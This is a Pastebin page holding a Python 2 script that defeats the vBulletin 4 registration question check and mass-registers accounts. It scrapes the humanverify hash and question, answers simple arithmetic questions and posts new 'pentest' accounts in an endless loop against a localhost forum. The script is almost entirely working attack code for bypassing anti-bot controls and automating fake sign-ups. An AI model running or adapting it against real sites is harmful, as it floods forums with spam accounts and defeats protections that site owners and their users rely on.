Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # -*- coding: utf-8 -*-
- # Code by parkdream1
- # http://www.youtube.com/user/DevilSecurityX
- import sys
- ### IMPORT LIB ###
- import urllib
- import httplib
- import re
- import time
- from random import randrange
- taikhoan = 0
- ### DETECT humanverify[hash] ###
- ### DETECT Random Question ###
- def step1():
- global hiddenkey
- global traloi
- ### headers request ###
- headers = ({"Host": "localhost:8080",
- "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:23.0) Gecko/20100101 Firefox/23.0",
- "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
- "Accept-Language": "en-US,en;q=0.5",
- "Referer": "http://localhost:8080/vbb4/",
- "Connection": "keep-alive"})
- ### send request ###
- conn = httplib.HTTPConnection("localhost",8080)
- conn.request("GET", "/vbb4/register.php", None, headers)
- response = conn.getresponse()
- print "Status : %s" % response.status, response.reason
- the_page = response.read()
- the_page = the_page.replace("\t","").replace("\n","").replace("\r","")
- print "[*] Detect Security Code and Security Hash"
- ### search hash and question ###
- key = re.search('name="humanverify\[hash\]" value="(.*)" /></div></div> </div>',the_page)
- question = re.search('<div class="rightcol"><p class="description">(.*)</p><input type="text" class',the_page)
- if question:
- cauhoi = question.group(1)
- else:
- print "Detect Security Code Error\nExit"
- exit(1)
- if key:
- hiddenkey = key.group(1)
- else:
- print "Detect Security Code Error\nExit"
- exit(1)
- print "Security Code: %s" % cauhoi
- print "Security Hash: %s" % hiddenkey
- ### get answer ###
- if cauhoi == '1+1=?':
- traloi = '2'
- elif cauhoi == '2+2=?':
- traloi = '4'
- elif cauhoi == '3+3=?':
- traloi = '6'
- else:
- print "Can't ByPass Security Question"
- print "[*] Bypass Security Code Ok"
- print "Answer is : %s" % (traloi)
- ### BUILD USERNAME , PASSWORD , EMAIl ###
- ### SEND REQUEST ###
- def step2():
- i = randrange(9999)
- user = 'pentest%s' % (i)
- email = 'pentest%s@gmail.com' % (i)
- c_email = 'pentest%s@gmail.com' % (i)
- print "UserName: %s" % user
- print "Email: %s" % email
- params = urllib.urlencode({'username':'%s'%(user),
- 'password': '',
- 'passwordconfirm': '',
- 'email':'%s'%(email),
- 'emailconfirm':'%s'%(c_email),
- 'humanverify[input]':'%s'%(traloi),
- 'humanverify[hash]':'%s'%(hiddenkey),
- 'referrername':'',
- 'timezoneoffset':'',
- 'dst':'2',
- 'options[adminemail]':'2',
- 'agree':'1',
- 's':'',
- 'securitytoken':'guest',
- 'do':'addmember',
- 'url':'http://localhost:8080/vbb4/',
- 'password_md5':'1f5d020ac0ce982f5846897871b6b5ec',
- 'passwordconfirm_md5':'1f5d020ac0ce982f5846897871b6b5ec',
- 'day':'',
- 'month':'',
- 'year':''})
- lenth = len(params)
- headers = ({
- "Host": "localhost:8080",
- "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:23.0) Gecko/20100101 Firefox/23.0",
- "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
- "Accept-Language": "en-US,en;q=0.5",
- "Referer": "http://localhost:8080/vbb4/register.php",
- "Connection": "keep-alive",
- "Content-type": "application/x-www-form-urlencoded",
- "Content-Length": "%s"%lenth})
- print "[*] Start Register User %s" % user
- print "[*] Please Wait ..."
- conn = httplib.HTTPConnection("localhost",8080)
- conn.request("POST", "/vbb4/register.php?do=addmember", params, headers)
- response = conn.getresponse()
- print "Status : %s" % response.status, response.reason
- print "Registered Successfully User: %s" % user
- print "================================================================================"
- conn.close()
- ### MAIN ###
- if __name__ == "__main__":
- while True:
- step1()
- time.sleep(1)
- step2()
- taikhoan = taikhoan + 1
- print "[*] Registered %s User\n" % taikhoan
- print "================================================================================"
- time.sleep(2)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement